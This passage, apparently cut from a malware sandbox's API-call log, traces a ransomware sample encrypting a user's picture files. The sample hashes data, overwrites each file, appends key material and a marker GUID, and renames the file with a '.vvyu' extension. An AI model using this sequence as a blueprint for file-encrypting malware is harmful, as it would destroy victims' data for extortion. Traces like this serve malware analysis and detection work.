KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.578] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c278) returned 1 [0201.579] CryptCreateHash (in: hProv=0x67c278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.579] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.579] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.579] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.579] GetLastError () returned 0x0 [0201.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.579] GetLastError () returned 0x0 [0201.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.580] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.580] CryptReleaseContext (hProv=0x67c278, dwFlags=0x0) returned 1 [0201.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.580] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.580] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.580] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa970) returned 0x2ea99b0 [0201.581] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fe88 [0201.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3488 [0201.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fed0 [0201.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34a0 [0201.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34d0 [0201.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3530 [0201.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34e8 [0201.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.582] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3530 [0201.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0201.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34e8 [0201.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea34d0 [0201.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0201.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0201.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0201.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0201.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.585] GetCurrentThreadId () returned 0x66c [0201.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8a18 [0201.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.586] GetCurrentThreadId () returned 0x66c [0201.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3530 [0201.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34d0 [0201.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0201.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34e8 [0201.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34b8 [0201.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3548 [0201.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0201.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3518 [0201.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3500 [0201.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3560 [0201.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3500 [0201.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0201.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34d0 [0201.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0201.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0201.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0201.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fed0 | out: hHeap=0x620000) returned 1 [0201.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.600] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xa960, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xa960, lpOverlapped=0x0) returned 1 [0201.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.601] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xa965, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.601] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.602] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.603] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.603] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.603] CloseHandle (hObject=0x510) returned 1 [0201.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0201.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0201.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0201.605] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\VL493DrYWM.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\vl493drywm.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\VL493DrYWM.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\vl493drywm.bmp.vvyu")) returned 1 [0201.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.606] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0201.609] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9dc0ee0, ftCreationTime.dwHighDateTime=0x1d8a47f, ftLastAccessTime.dwLowDateTime=0xdf5fd9b0, ftLastAccessTime.dwHighDateTime=0x1d8a68d, ftLastWriteTime.dwLowDateTime=0xdf5fd9b0, ftLastWriteTime.dwHighDateTime=0x1d8a68d, nFileSizeHigh=0x0, nFileSizeLow=0x12d7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XUdJWURucyLo9.bmp", cAlternateFileName="XUDJWU~1.BMP")) returned 1 [0201.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0201.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.610] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\XUdJWURucyLo9.bmp") returned=".bmp" [0201.610] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\XUdJWURucyLo9.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\xudjwurucylo9.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.610] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=77181) returned 1 [0201.610] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.613] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x12d57, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.613] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.616] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) 